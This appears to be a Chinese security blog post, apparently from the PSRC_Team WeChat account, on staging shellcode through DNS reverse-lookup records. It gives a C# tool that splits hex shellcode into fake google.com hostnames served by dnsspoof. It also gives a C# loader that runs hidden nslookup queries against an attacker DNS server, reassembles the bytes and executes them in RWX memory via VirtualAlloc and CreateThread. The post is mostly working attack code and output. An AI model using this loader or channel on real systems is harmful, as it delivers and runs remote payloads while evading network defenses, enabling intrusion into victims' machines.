• 0x01 什么是DNS反向解析

• 0x02 利用思路

•          2.1 工具dnsspoof

•          2.2 思路

•          2.3 优点

•          2.4 缺点

• 0x03 C#实现DNS反向解析传输数据

•          3.1 DnsHostCreate

•          3.2 启动dns服务

•          3.3 C# DNS text Loader

• 0x04 运行结果

• 0x05 结论

192.168.1.0 "fc4883e4f0e8c8000000415141505251564831d265488b5260488b521848.google.com"

dnsspoof -f dns.txt

λ nslookup 192.168.1.0 10.0.0.8DNS request timed out.    timeout was 2 seconds.服务器:  UnKnownAddress:  10.0.0.8名称:    "fc4883e4f0e8c8000000415141505251564831d265488b5260488b521848.google.com"Address:  192.168.1.0

string domain = args[0];string ipsegment = args[1];string payload = args[2];string str = payload.Replace("0x","").Replace(", ","").Replace(" ","");

int dns_data_lenght = str.Length / 60;if(str.Length % 60 !=0 ){    dns_data_lenght += 1;}

for (int i = 0; i < dns_data_lenght; i++){    string dns = "";    if (i == dns_data_lenght - 1)    {        dns = str.Substring((dns_data_lenght - 1) * 60);    }    else    {        dns = str.Substring(i * 60, 60);    }    Console.WriteLine(string.Format("{0}.{1} \"{2}.{3}\"", ipsegment, i.ToString(),dns,domain));}

192.168.1.0 "fc4883e4f0e8c8000000415141505251564831d265488b5260488b521848.google.com"192.168.1.1 "8b5220488b7250480fb74a4a4d31c94831c0ac3c617c022c2041c1c90d41.google.com"192.168.1.2 "01c1e2ed524151488b52208b423c4801d0668178180b0275728b80880000.google.com"    ...192.168.1.29 "9689e2ffd54883c42085c074b6668b074801c385c075d758585848050000.google.com"192.168.1.30 "000050c3e87ffdffff31302e302e302e380000000000.google.com"

[!] IPaddress Counter is: 31[!] IP Segment: 192.168.1.

apt-get install dnsspoof -y

dnsspoof -f dns.txt

λ nslookup 192.168.1.0 10.0.0.8DNS request timed out.    timeout was 2 seconds.服务器:  UnKnownAddress:  10.0.0.8名称:    "fc4883e4f0e8c8000000415141505251564831d265488b5260488b521848.google.com"Address:  192.168.1.0

string _DnsServer = "10.0.0.8";string _IPaddress_Begin = "192.168.1.";int _IPaddress_Counter = 31;

ProcessStartInfo ns_Prcs_info = new ProcessStartInfo("nslookup.exe", DNS_PTR_A + " " + DnsServer);ns_Prcs_info.RedirectStandardInput = true;ns_Prcs_info.RedirectStandardOutput = true;ns_Prcs_info.UseShellExecute = false;var random = new Random();System.Threading.Thread.Sleep(random.Next(1, 800));Process nslookup = new Process();nslookup.StartInfo = ns_Prcs_info;nslookup.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;nslookup.Start();string computerList = nslookup.StandardOutput.ReadToEnd();

DNS request timed out.    timeout was 2 seconds.服务器:  UnKnownAddress:  10.0.0.8名称:    "fc4883e4f0e8c8000000415141505251564831d265488b5260488b521848.google.com"Address:  192.168.1.0

string[] lines = computerList.Split('\r', 'n');string last_line = lines[lines.Length - 4];string temp_1 = last_line.Remove(0, 9);_Records = "\"" + temp_1;int i = temp_1.LastIndexOf('.');string temp_2 = temp_1.Remove(i, (temp_1.Length - i));int b = temp_2.LastIndexOf('.');string final = temp_2.Remove(b, temp_2.Length - b);

for (int i = 0; i < _IPaddress_Counter; i++){    _DATA[i] = __nslookup(_IPaddress_Begin + i, _DnsServer);    DATA += _DATA[i].ToString();}

object tmp = new object();byte[] __Bytes = new byte[DATA.Length / 2];for (int i = 0; i < __Bytes.Length - 1; i++){    int start = i * 2;    tmp = DATA.Substring(start, 2);    byte current = Convert.ToByte("0x" + tmp.ToString(), 16);    __Bytes[i] = current;}

UInt32 funcAddr = VirtualAlloc(0, (UInt32)__Bytes.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);Marshal.Copy(__Bytes, 0, (IntPtr)(funcAddr), __Bytes.Length);IntPtr hThread = IntPtr.Zero;UInt32 threadId = 0;IntPtr pinfo = IntPtr.Zero;hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);WaitForSingleObject(hThread, 0xFFFFFFFF);

长按识别二维码关注我们

微信号：PSRC_Team